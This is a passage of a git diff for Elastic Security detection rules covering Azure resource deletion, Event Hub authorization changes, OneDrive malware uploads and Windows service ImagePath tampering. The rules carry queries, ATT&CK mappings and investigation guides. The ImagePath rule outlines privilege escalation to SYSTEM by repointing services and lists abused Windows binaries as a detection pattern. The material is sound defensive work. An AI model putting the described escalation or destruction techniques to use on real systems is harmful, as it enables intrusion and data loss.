infrastructure cleanup may trigger this alert. Document approved resource cleanup activities and coordinate with infrastructure teams to create exceptions during planned maintenance windows.\n- Infrastructure-as-Code (IaC) automation tools or CI/CD pipelines may delete multiple test or temporary storage accounts. 
Identify service principals used by automation tools and consider creating exceptions for these identities when operating in non-production environments.\n- Cloud resource optimization initiatives may involve bulk deletion of unused storage accounts. Coordinate with finance and infrastructure teams to understand planned cost optimization activities and schedule them during documented maintenance windows.\n- Disaster recovery testing or blue-green deployment strategies may involve deletion of multiple storage accounts. Work with DevOps teams to identify these patterns and create time-based exceptions during testing periods.\n\n### Response and remediation\n\n- Immediately investigate whether the deletions were authorized by verifying with the account owner or relevant stakeholders.\n- If the deletions were unauthorized, disable the compromised user account or service principal immediately to prevent further damage.\n- Attempt to recover deleted storage accounts if soft-delete is enabled, or restore data from backups for critical storage accounts.\n- Review and audit all Azure RBAC permissions to identify how the attacker gained storage account deletion capabilities (requires Contributor or Owner role).\n- Conduct a full security assessment to identify the initial access vector and any other compromised accounts or resources.\n- Implement Azure Resource Locks on all critical storage accounts to prevent accidental or malicious deletion.\n- Configure Azure Policy to require approval workflows for storage account deletions using Azure Blueprints or custom governance solutions.\n- Enable Azure Activity Log alerts to notify security teams immediately when storage accounts are deleted.\n- Escalate the incident to the security operations center (SOC) or incident response team for investigation of potential broader compromise.\n- Document the incident and update security policies, playbooks, and procedures to prevent similar incidents in the future.\n", + "query": "event.dataset: azure.activitylogs and\n azure.activitylogs.operation_name: \"MICROSOFT.STORAGE/STORAGEACCOUNTS/DELETE\" and\n azure.activitylogs.identity.claims_initiated_by_user.name: *\n", + "references": [ + "https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.identity.claims_initiated_by_user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b2c3d4e5-6f7a-8b9c-0d1e-2f3a4b5c6d7e", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Domain: Storage", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + }, + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } + ], + "threshold": { + "cardinality": [ + { + "field": "azure.resource.name", + 
"value": 5 + } + ], + "field": [ + "azure.activitylogs.identity.claims_initiated_by_user.name" + ], + "value": 1 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 1 + }, + "id": "b2c3d4e5-6f7a-8b9c-0d1e-2f3a4b5c6d7e_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b66b7e2b-d50a-49b9-a6fc-3a383baedc6b_107.json b/packages/security_detection_engine/kibana/security_rule/b66b7e2b-d50a-49b9-a6fc-3a383baedc6b_107.json new file mode 100644 index 00000000000..4871dcdd135 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b66b7e2b-d50a-49b9-a6fc-3a383baedc6b_107.json @@ -0,0 +1,160 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry modifications to default services that could enable privilege escalation to SYSTEM. Attackers with privileges from groups like Server Operators may change the ImagePath of services to executables under their control or to execute commands.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*", + "logs-crowdstrike.fdr*", + "logs-sentinel_one_cloud_funnel.*", + "logs-m365_defender.event-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via Service ImagePath Modification", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Privilege Escalation via Service ImagePath Modification\n\nWindows services are crucial for system operations, often running with high privileges. Adversaries exploit this by altering the ImagePath registry key of services to execute malicious code with elevated privileges. The detection rule identifies suspicious modifications to service ImagePaths, focusing on changes that deviate from standard executable paths, thus flagging potential privilege escalation attempts.\n\n### Possible investigation steps\n\n- Review the specific registry key and value that triggered the alert to confirm it matches one of the monitored service keys, such as those listed in the query (e.g., *\\LanmanServer, *\\Winmgmt).\n- Examine the modified ImagePath value to determine if it points to a non-standard executable path or a suspicious executable, especially those not located in %systemroot%\\system32\\.\n- Check the process.executable field to identify the process responsible for the registry modification and assess its legitimacy.\n- Investigate the user account associated with the modification event to determine if it has elevated privileges, such as membership in the Server Operators group.\n- Correlate the event with other logs or alerts to identify any related suspicious activities, such as unexpected service starts or process executions.\n- Review recent changes or activities on the host to identify any unauthorized access or configuration changes that could indicate a broader compromise.\n\n### False positive analysis\n\n- Legitimate software updates or installations may modify service ImagePaths. 
Users can create exceptions for known update processes or installation paths to prevent false positives.\n- System administrators might intentionally change service configurations for maintenance or troubleshooting. Document and exclude these changes by adding exceptions for specific administrator actions or paths.\n- Custom scripts or automation tools that modify service settings as part of their operation can trigger alerts. Identify and whitelist these scripts or tools to avoid unnecessary alerts.\n- Some third-party security or management software may alter service ImagePaths as part of their functionality. Verify the legitimacy of such software and exclude their known paths from detection.\n- Changes made by trusted IT personnel during system configuration or optimization should be logged and excluded from alerts to reduce noise.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement.\n- Terminate any suspicious processes identified as running from non-standard executable paths, especially those not originating from the system32 directory.\n- Restore the modified ImagePath registry key to its original state using a known good configuration or backup.\n- Conduct a thorough scan of the system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any additional malicious files or persistence mechanisms.\n- Review and audit user accounts and group memberships, particularly those with elevated privileges like Server Operators, to ensure no unauthorized changes have been made.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n- Implement enhanced monitoring and alerting for future modifications to service ImagePath registry keys, focusing on deviations from standard paths to detect similar threats promptly.", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and process.executable != null and\n registry.data.strings != null and registry.value == \"ImagePath\" and\n registry.key : (\n \"*\\\\ADWS\", \"*\\\\AppHostSvc\", \"*\\\\AppReadiness\", \"*\\\\AudioEndpointBuilder\", \"*\\\\AxInstSV\", \"*\\\\camsvc\", \"*\\\\CertSvc\",\n \"*\\\\COMSysApp\", \"*\\\\CscService\", \"*\\\\defragsvc\", \"*\\\\DeviceAssociationService\", \"*\\\\DeviceInstall\", \"*\\\\DevQueryBroker\",\n \"*\\\\Dfs\", \"*\\\\DFSR\", \"*\\\\diagnosticshub.standardcollector.service\", \"*\\\\DiagTrack\", \"*\\\\DmEnrollmentSvc\", \"*\\\\DNS\",\n \"*\\\\dot3svc\", \"*\\\\Eaphost\", \"*\\\\GraphicsPerfSvc\", \"*\\\\hidserv\", \"*\\\\HvHost\", \"*\\\\IISADMIN\", \"*\\\\IKEEXT\",\n \"*\\\\InstallService\", \"*\\\\iphlpsvc\", \"*\\\\IsmServ\", \"*\\\\LanmanServer\", \"*\\\\MSiSCSI\", \"*\\\\NcbService\", \"*\\\\Netlogon\",\n \"*\\\\Netman\", \"*\\\\NtFrs\", \"*\\\\PlugPlay\", \"*\\\\Power\", \"*\\\\PrintNotify\", \"*\\\\ProfSvc\", \"*\\\\PushToInstall\", \"*\\\\RSoPProv\",\n \"*\\\\sacsvr\", \"*\\\\SENS\", \"*\\\\SensorDataService\", \"*\\\\SgrmBroker\", \"*\\\\ShellHWDetection\", \"*\\\\shpamsvc\", \"*\\\\StorSvc\",\n \"*\\\\svsvc\", \"*\\\\swprv\", \"*\\\\SysMain\", \"*\\\\Themes\", \"*\\\\TieringEngineService\", \"*\\\\TokenBroker\", \"*\\\\TrkWks\",\n \"*\\\\UALSVC\", \"*\\\\UserManager\", \"*\\\\vm3dservice\", \"*\\\\vmicguestinterface\", \"*\\\\vmicheartbeat\", \"*\\\\vmickvpexchange\",\n \"*\\\\vmicrdv\", \"*\\\\vmicshutdown\", 
\"*\\\\vmicvmsession\", \"*\\\\vmicvss\", \"*\\\\vmvss\", \"*\\\\VSS\", \"*\\\\w3logsvc\", \"*\\\\W3SVC\",\n \"*\\\\WalletService\", \"*\\\\WAS\", \"*\\\\wercplsupport\", \"*\\\\WerSvc\", \"*\\\\Winmgmt\", \"*\\\\wisvc\", \"*\\\\wmiApSrv\",\n \"*\\\\WPDBusEnum\", \"*\\\\WSearch\"\n ) and\n not (\n registry.data.strings : (\n \"?:\\\\Windows\\\\system32\\\\*.exe\",\n \"%systemroot%\\\\system32\\\\*.exe\",\n \"%windir%\\\\system32\\\\*.exe\",\n \"%SystemRoot%\\\\system32\\\\svchost.exe -k *\",\n \"%windir%\\\\system32\\\\svchost.exe -k *\"\n ) and\n not registry.data.strings : (\n \"*\\\\cmd.exe\",\n \"*\\\\cscript.exe\",\n \"*\\\\ieexec.exe\",\n \"*\\\\iexpress.exe\",\n \"*\\\\installutil.exe\",\n \"*\\\\Microsoft.Workflow.Compiler.exe\",\n \"*\\\\msbuild.exe\",\n \"*\\\\mshta.exe\",\n \"*\\\\msiexec.exe\",\n \"*\\\\msxsl.exe\",\n \"*\\\\net.exe\",\n \"*\\\\powershell.exe\",\n \"*\\\\pwsh.exe\",\n \"*\\\\reg.exe\",\n \"*\\\\RegAsm.exe\",\n \"*\\\\RegSvcs.exe\",\n \"*\\\\regsvr32.exe\",\n \"*\\\\rundll32.exe\",\n \"*\\\\vssadmin.exe\",\n \"*\\\\wbadmin.exe\",\n \"*\\\\wmic.exe\",\n \"*\\\\wscript.exe\"\n )\n )\n", + "references": [ + "https://cube0x0.github.io/Pocing-Beyond-DA/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.key", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b66b7e2b-d50a-49b9-a6fc-3a383baedc6b", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.011", + "name": "Services Registry Permissions Weakness", + "reference": "https://attack.mitre.org/techniques/T1574/011/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1569", + "name": "System Services", + "reference": "https://attack.mitre.org/techniques/T1569/", + "subtechnique": [ + 
{ + "id": "T1569.002", + "name": "Service Execution", + "reference": "https://attack.mitre.org/techniques/T1569/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "b66b7e2b-d50a-49b9-a6fc-3a383baedc6b_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_104.json b/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_104.json deleted file mode 100644 index 685b36038c6..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_104.json +++ /dev/null @@ -1,96 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an Event Hub Authorization Rule is created or updated in Azure. An authorization rule is associated with specific rights, and carries a pair of cryptographic keys. When you create an Event Hubs namespace, a policy rule named RootManageSharedAccessKey is created for the namespace. This has manage permissions for the entire namespace and it's recommended that you treat this rule like an administrative root account and don't use it in your application.", - "false_positives": [ - "Authorization rule additions or modifications may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Authorization rule additions or modifications from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Event Hub Authorization Rule Created or Updated", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Event Hub Authorization Rule Created or Updated\n\nAzure Event Hub Authorization Rules manage access to Event Hubs via cryptographic keys, akin to administrative credentials. Adversaries may exploit these rules to gain unauthorized access or escalate privileges, potentially exfiltrating data. 
The detection rule monitors for the creation or modification of these rules, flagging successful operations to identify potential misuse or unauthorized changes.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the user or service principal associated with the operation by examining the `azure.activitylogs.operation_name` and `event.outcome` fields.\n- Check the timestamp of the event to determine when the authorization rule was created or updated, and correlate this with any other suspicious activities around the same time.\n- Investigate the specific Event Hub namespace affected by the rule change to understand its role and importance within the organization.\n- Verify if the `RootManageSharedAccessKey` or any other high-privilege authorization rule was involved, as these carry significant risk if misused.\n- Assess the necessity and legitimacy of the rule change by contacting the user or team responsible for the Event Hub namespace to confirm if the change was authorized and aligns with operational needs.\n- Examine any subsequent access patterns or data transfers from the affected Event Hub to detect potential data exfiltration or misuse following the rule change.\n\n### False positive analysis\n\n- Routine administrative updates to authorization rules by IT staff can trigger alerts. To manage this, create exceptions for known administrative accounts or scheduled maintenance windows.\n- Automated scripts or deployment tools that update authorization rules as part of regular operations may cause false positives. Identify these scripts and exclude their activity from alerts by filtering based on their service principal or user identity.\n- Changes made by trusted third-party services integrated with Azure Event Hub might be flagged. Verify these services and exclude their operations by adding them to an allowlist.\n- Frequent updates during development or testing phases can lead to false positives. Consider setting up separate monitoring profiles for development environments to reduce noise.\n- Legitimate changes made by users with appropriate permissions might be misinterpreted as threats. 
Regularly review and update the list of authorized users to ensure only necessary personnel have access, and exclude their actions from alerts.\n\n### Response and remediation\n\n- Immediately revoke or rotate the cryptographic keys associated with the affected Event Hub Authorization Rule to prevent unauthorized access.\n- Review the Azure Activity Logs to identify any unauthorized access or data exfiltration attempts that may have occurred using the compromised authorization rule.\n- Implement conditional access policies to restrict access to Event Hub Authorization Rules based on user roles and network locations.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems or data have been compromised.\n- Conduct a security review of all Event Hub Authorization Rules to ensure that only necessary permissions are granted and that the RootManageSharedAccessKey is not used in applications.\n- Enhance monitoring and alerting for changes to authorization rules by integrating with a Security Information and Event Management (SIEM) system to detect similar threats in the future.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/WRITE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/event-hubs/authorize-access-shared-access-signature" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "b6dce542-2b75-4ffb-b7d6-38787298ba9d", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Log Auditing", - "Tactic: Collection", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0009", - "name": "Collection", - "reference": "https://attack.mitre.org/tactics/TA0009/" - }, - "technique": [ - { - "id": "T1530", - "name": "Data from Cloud Storage", - "reference": "https://attack.mitre.org/techniques/T1530/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0010", - "name": "Exfiltration", - "reference": "https://attack.mitre.org/tactics/TA0010/" - }, - "technique": [ - { - "id": "T1537", - "name": "Transfer Data to Cloud Account", - "reference": "https://attack.mitre.org/techniques/T1537/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 104 - }, - "id": "b6dce542-2b75-4ffb-b7d6-38787298ba9d_104", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b8c3e5d0-8a1a-11ef-9b4a-f661ea17fbce_1.json b/packages/security_detection_engine/kibana/security_rule/b8c3e5d0-8a1a-11ef-9b4a-f661ea17fbce_1.json new file mode 100644 index 00000000000..49ba7487b1a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b8c3e5d0-8a1a-11ef-9b4a-f661ea17fbce_1.json @@ -0,0 +1,80 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": 
"Identifies the deletion of Azure Recovery Services resources. Azure Recovery Services vaults contain data for copies of VMs, workloads, servers, and other resources regarding Infrastructure as a Service (IaaS). Adversaries may delete these recovery services to impact backup capabilities during stable operations or to inhibit disaster recovery services during ransom-based attacks or operational disruptions.", + "from": "now-9m", + "index": [ + "logs-azure.activitylogs-*", + "filebeat-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Azure Recovery Services Resource Deleted", + "query": "event.dataset:azure.activitylogs and\n azure.activitylogs.operation_name:MICROSOFT.RECOVERYSERVICES/*/DELETE and\n event.outcome:(Success or success)\n", + "references": [ + "https://www.microsoft.com/en-us/security/blog/2023/07/25/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b8c3e5d0-8a1a-11ef-9b4a-f661ea17fbce", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Storage", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "b8c3e5d0-8a1a-11ef-9b4a-f661ea17fbce_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_103.json b/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_103.json deleted file mode 100644 index 3b66502dfde..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_103.json +++ /dev/null @@ -1,103 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of a resource group in Azure, which includes all resources within the group. Deletion is permanent and irreversible. An adversary may delete a resource group in an attempt to evade defenses or intentionally destroy data.", - "false_positives": [ - "Deletion of a resource group may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Resource group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Resource Group Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Resource Group Deletion\n\nAzure Resource Groups are containers that hold related resources for an Azure solution, enabling efficient management and organization. Adversaries may exploit this by deleting entire groups to disrupt services or erase data, causing significant impact. The detection rule monitors Azure activity logs for successful deletion operations, flagging potential malicious actions for further investigation.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by checking for the operation name \"MICROSOFT.RESOURCES/SUBSCRIPTIONS/RESOURCEGROUPS/DELETE\" and ensure the event outcome is marked as \"Success\" or \"success\".\n- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs.\n- Check the timestamp of the deletion event to determine when the resource group was deleted and correlate this with any other suspicious activities around the same time.\n- Investigate the resources contained within the deleted resource group to assess the potential impact, including any critical services or data that may have been affected.\n- Review any recent changes in permissions or roles assigned to the user or service principal involved in the deletion to identify potential privilege escalation or misuse.\n- Examine any related alerts or logs for unusual activities or patterns that might indicate a broader attack or compromise within the Azure environment.\n\n### False positive analysis\n\n- Routine maintenance activities by IT teams may trigger alerts when resource groups are intentionally deleted as part of regular updates or infrastructure changes. To manage this, create exceptions for known maintenance windows or specific user accounts responsible for these tasks.\n- Automated scripts or deployment tools that manage resource lifecycles might delete resource groups as part of their normal operation. Identify these scripts and exclude their activity from alerts by filtering based on the service principal or automation account used.\n- Testing environments often involve frequent creation and deletion of resource groups. Exclude these environments from alerts by tagging them appropriately and configuring the detection rule to ignore actions on tagged resources.\n- Mergers or organizational restructuring can lead to legitimate resource group deletions. Coordinate with relevant departments to anticipate these changes and temporarily adjust monitoring rules to prevent false positives.\n- Ensure that any third-party services or consultants with access to your Azure environment are accounted for, as their activities might include resource group deletions. Establish clear communication channels to verify their actions and adjust monitoring rules accordingly.\n\n### Response and remediation\n\n- Immediately isolate the affected Azure subscription to prevent further unauthorized actions. 
This can be done by temporarily disabling access or applying strict access controls.\n- Review and revoke any suspicious or unauthorized access permissions associated with the affected resource group to prevent further exploitation.\n- Restore the deleted resources from backups if available. Ensure that backup and recovery processes are validated and functioning correctly.\n- Conduct a thorough audit of recent Azure activity logs to identify any other potentially malicious actions or compromised accounts.\n- Escalate the incident to the security operations team for a detailed investigation and to determine if there are broader implications or related threats.\n- Implement additional monitoring and alerting for similar deletion activities across all Azure subscriptions to enhance early detection of such threats.\n- Review and strengthen access management policies, ensuring that only authorized personnel have the necessary permissions to delete resource groups.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.RESOURCES/SUBSCRIPTIONS/RESOURCEGROUPS/DELETE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-portal" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "bb4fe8d2-7ae2-475c-8b5d-55b449e4264f", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Log Auditing", - "Tactic: Impact", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1485", - "name": "Data Destruction", - "reference": "https://attack.mitre.org/techniques/T1485/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "bb4fe8d2-7ae2-475c-8b5d-55b449e4264f_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_207.json b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_207.json deleted file mode 100644 index 99c83d34642..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_207.json +++ /dev/null @@ -1,84 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the occurence of files uploaded to OneDrive being detected 
as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment.", - "false_positives": [ - "Benign files can trigger signatures in the built-in virus protection" - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "OneDrive Malware File Upload", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating OneDrive Malware File Upload\n\nOneDrive, a cloud storage service, facilitates file sharing and collaboration within organizations. However, adversaries can exploit this by uploading malware, which can spread across shared environments, leading to lateral movement within a network. The detection rule identifies such threats by monitoring OneDrive activities for malware detection events, focusing on file operations flagged by Microsoft's security engine. This proactive approach helps in identifying and mitigating potential breaches.\n\n### Possible investigation steps\n\n- Review the alert details to confirm the event dataset is 'o365.audit' and the event provider is 'OneDrive' to ensure the alert is relevant to OneDrive activities.\n- Examine the specific file operation flagged by the event code 'SharePointFileOperation' and action 'FileMalwareDetected' to identify the file in question and understand the nature of the detected malware.\n- Identify the user account associated with the file upload to determine if the account has been compromised or if the user inadvertently uploaded the malicious file.\n- Check the sharing settings of the affected file to assess the extent of exposure and identify any other users or systems that may have accessed the file.\n- Investigate the file's origin and history within the organization to trace how it was introduced into the environment and whether it has been shared or accessed by other users.\n- Review any additional security alerts or logs related to the user account or file to identify potential patterns of malicious activity or further compromise.\n- Coordinate with IT and security teams to isolate the affected file and user account, and initiate remediation steps to prevent further spread of the malware.\n\n### False positive analysis\n\n- Legitimate software updates or patches may be flagged as malware if they are not yet recognized by the security engine. Users should verify the source and integrity of the file and consider adding it to an exception list if confirmed safe.\n- Files containing scripts or macros used for automation within the organization might trigger false positives. Review the file's purpose and origin, and whitelist it if it is a known and trusted internal tool.\n- Shared files from trusted partners or vendors could be mistakenly identified as threats. Establish a process to verify these files with the sender and use exceptions for recurring, verified files.\n- Archived or compressed files that contain known safe content might be flagged due to their format. 
Decompress and scan the contents separately to confirm their safety before adding exceptions.\n- Files with unusual or encrypted content used for legitimate business purposes may be misclassified. Ensure these files are documented and approved by IT security before excluding them from alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected OneDrive account to prevent further file sharing and potential spread of malware within the organization.\n- Notify the user associated with the account about the detected malware and instruct them to cease any file sharing activities until further notice.\n- Conduct a thorough scan of the affected files using an updated antivirus or endpoint detection and response (EDR) solution to confirm the presence of malware and identify any additional infected files.\n- Remove or quarantine the identified malicious files from OneDrive and any other locations they may have been shared to prevent further access or execution.\n- Review and revoke any shared links or permissions associated with the infected files to ensure no unauthorized access is possible.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if any lateral movement or additional compromise has occurred.\n- Implement enhanced monitoring and alerting for similar OneDrive activities to quickly detect and respond to any future malware uploads or related threats.", - "query": "event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", - "references": [ - 